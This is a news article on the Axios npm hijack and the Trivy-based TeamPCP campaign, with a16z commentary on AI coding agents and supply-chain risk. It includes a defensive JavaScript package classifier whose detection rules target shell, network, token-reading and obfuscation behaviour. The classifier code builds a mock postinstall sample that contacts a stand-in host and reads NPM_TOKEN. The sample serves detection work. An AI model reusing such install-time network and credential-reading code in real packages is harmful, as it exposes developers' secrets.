Andreessen Horowitz information security partner Joel de la Garza, AI infrastructure team investor Malika Aubakirova, and general partner Jane Lackey. [Photo: authors’ photos posted on LinkedIn, edited with Gemini]

Axios, one of the most widely used software packages on the internet, was recently hacked.

The attacker showed they could plant malware on millions of devices without touching a single line of source code. Axios is a core library in the JavaScript ecosystem that handles HTTP requests, with weekly downloads topping 100 million.

The hacker behind the Axios attack did three things: they took over a maintainer account, added one new dependency to the package list, and shipped an update.

The added package, “plain-crypto-js”, had been newly registered only hours before the attack. When installed, it identified the operating system, downloaded and ran a remote-access trojan tailored to that system, and erased its traces. By the time a developer opened the node_modules folder, it had already disappeared, and the malware had already connected to the attacker’s server.

A bigger problem was that existing security tools could not catch it. The Andreessen Horowitz team that analysed the incident said, “Most software composition analysis tools work by checking against known vulnerability databases (CVE). The newly introduced malicious package cannot be found in CVE. Even running npm audit on the hacked Axios version returned ‘no issues found.’”

Andreessen Horowitz information security partner Joel de la Garza, AI infrastructure team investor Malika Aubakirova, and general partner Jane Lackey said of the attack, “The method was simple, but the damage was widespread.” They described it as a case showing that software supply-chain risk is rising as AI coding spreads.

They said AI coding tools that boost developer productivity are also making supply chains more vulnerable.

They cited research analyzing more than 117,000 dependency changes across thousands of GitHub repositories, and said AI agents choose versions with known vulnerabilities 50 percent more often than humans. They said, “Worse, the vulnerable versions chosen by AI are harder to fix. Much more often, they require large-scale upgrades that need changes across the codebase.”

A new attack technique dubbed “slopsquatting” has also emerged as a threat. It exploits the fact that LLMs often make up package names that do not exist. Citing one study, they said, “About 20 percent of packages recommended by AI did not exist, and 43 percent of those repeated the same names even after multiple queries. Attackers are targeting this.”

Autonomous coding agents are also a risk from a security perspective. They said, “Autonomous coding agents install dependencies, run builds, and open pull requests without human involvement. They optimize for ‘does it work’ but do not ask ‘is it safe.’ Security review time effectively approaches zero.”

A campaign known as TeamPCP showed how supply-chain attacks can spread in a chain reaction, with a bigger impact than the Axios case. They said the starting point was the open-source vulnerability scanner Trivy. The attacker stole an access token by exploiting a workflow configuration error in GitHub Actions, the automation tool that builds, tests and deploys code. Using that token, the attacker forcibly inserted malicious code into nearly all Trivy version tags.

People who downloaded Trivy for security checks ended up unknowingly running code planted by the attacker. The malware stole various access keys stored in automated development environments, including server access keys, cloud service credentials, and package publishing permissions. A token for npm, the registry and management tool where JavaScript developers upload and download packages, was also stolen and was used in the next stage of the attack.

They said, “An attack that started with a single token spread in 8 days to GitHub Actions, Docker Hub, npm, PyPI, and the VS Code Extension Marketplace. Thousands of organisations were exposed to potential impact.”

They said an effective way to respond to the growing security risk from AI coding is to sharply raise detection speed. They warned, “Code is now created at the speed of machines, not people. If defence cannot keep up at the same speed, the machines that deploy code will also deploy malware.”

Even so, it is unclear whether the industry can respond to new AI-era threats at the required detection speed. The industry average time to detect a supply-chain breach is 267 days. SolarWinds took 14 months, and XZ Utils took two years.

Against this backdrop, security startup Socket drew attention by detecting the malicious dependency used in the Axios attack within six minutes of its deployment, about 63,000 times faster than the industry average. It flagged the malicious package itself 16 minutes before the hacked Axios version was first deployed.

They said Socket’s approach differs from the existing model. Instead of checking against the CVE database, Socket analyses what the code actually does: whether it accesses the network, runs shell processes, obfuscates payloads, or reads environment variables. That is why it can detect new malicious packages that have no CVE and no precedent.
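To make the behaviour-based idea concrete, here is a minimal static classifier written for this article (not Socket’s scanner, and not code from the a16z authors). It scores a package’s JavaScript source on the four behaviour classes named above plus install-time lifecycle hooks; the package shape (`manifest` plus a `files` map) and both sample packages are constructed assumptions, and the sample host does not resolve.

```javascript
// Behaviour classes named in the article, as regexes over package source.
// These are heuristics: a hit means "look here", not "this is malware".
const BEHAVIOUR_RULES = {
  network: [/require\(\s*['"](https?|net|dns|dgram)['"]\s*\)/, /\bfetch\s*\(/],
  shell: [/require\(\s*['"]child_process['"]\s*\)/, /\b(execSync|execFile|spawn|spawnSync)\s*\(/],
  env_read: [/\bprocess\.env\b/],
  // eval/Function and encoded blobs are where packed payloads usually hide
  obfuscation: [/\beval\s*\(/, /\bnew\s+Function\s*\(/,
    /Buffer\.from\([^)]*['"](base64|hex)['"]\s*\)/, /(\\x[0-9a-f]{2}){8,}/i],
};
// Scripts npm runs automatically when a dependency is installed.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Return the sorted list of behaviour classes seen in any file of the package.
function classifyBehaviour(files) {
  const found = new Set();
  for (const src of Object.values(files)) {
    for (const [cls, rules] of Object.entries(BEHAVIOUR_RULES)) {
      if (rules.some((re) => re.test(src))) found.add(cls);
    }
  }
  return [...found].sort();
}

// Lifecycle hooks declared in package.json; these run before anyone opens node_modules.
function installHooks(manifest) {
  return INSTALL_HOOKS.filter((h) => manifest.scripts && manifest.scripts[h]);
}

// Policy: code that runs at install time and can both reach the network and
// spawn processes is blocked whether or not a CVE exists for it.
function assessPackage(pkg) {
  const behaviours = classifyBehaviour(pkg.files);
  const hooks = installHooks(pkg.manifest);
  const reaches = behaviours.includes('network') && behaviours.includes('shell');
  let verdict = 'allow';
  if (hooks.length > 0 && reaches) verdict = 'block';
  else if (hooks.length > 0 || behaviours.length >= 2) verdict = 'review';
  return { name: pkg.manifest.name, behaviours, hooks, verdict };
}

// Constructed sample packages (hypothetical names; example.invalid never resolves).
const BENIGN_PKG = { manifest: { name: 'tiny-json-util', scripts: { test: 'node test.js' } },
  files: { 'index.js': 'module.exports = (s) => JSON.parse(s);' } };
const SUSPICIOUS_PKG = { manifest: { name: 'example-suspicious-pkg', scripts: { postinstall: 'node setup.js' } },
  files: { 'setup.js': ["const os = require('os');", "const { execSync } = require('child_process');",
    "fetch('https://example.invalid/' + os.platform());", "const token = process.env.NPM_TOKEN;",
    "const blob = Buffer.from('aGVsbG8=', 'base64');"].join('\n') } };

console.log(JSON.stringify(assessPackage(BENIGN_PKG)), JSON.stringify(assessPackage(SUSPICIOUS_PKG)));
```

Running the check in CI at the moment a lockfile change introduces a new dependency, rather than after installation, is what moves the control to the point the a16z team describes.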

They stressed, “Leading teams share something in common. They do not wait until they are notified of a breach. They move security controls to the closest point to the threat, the moment a dependency enters the build. They do not rely only on the CVE database and instead analyse real package behaviour. They treat the dependency graph not as a list of libraries but as a living attack surface that must be continuously monitored.”

Copyright © DigitalToday. All rights reserved. Unauthorized reproduction and redistribution are prohibited.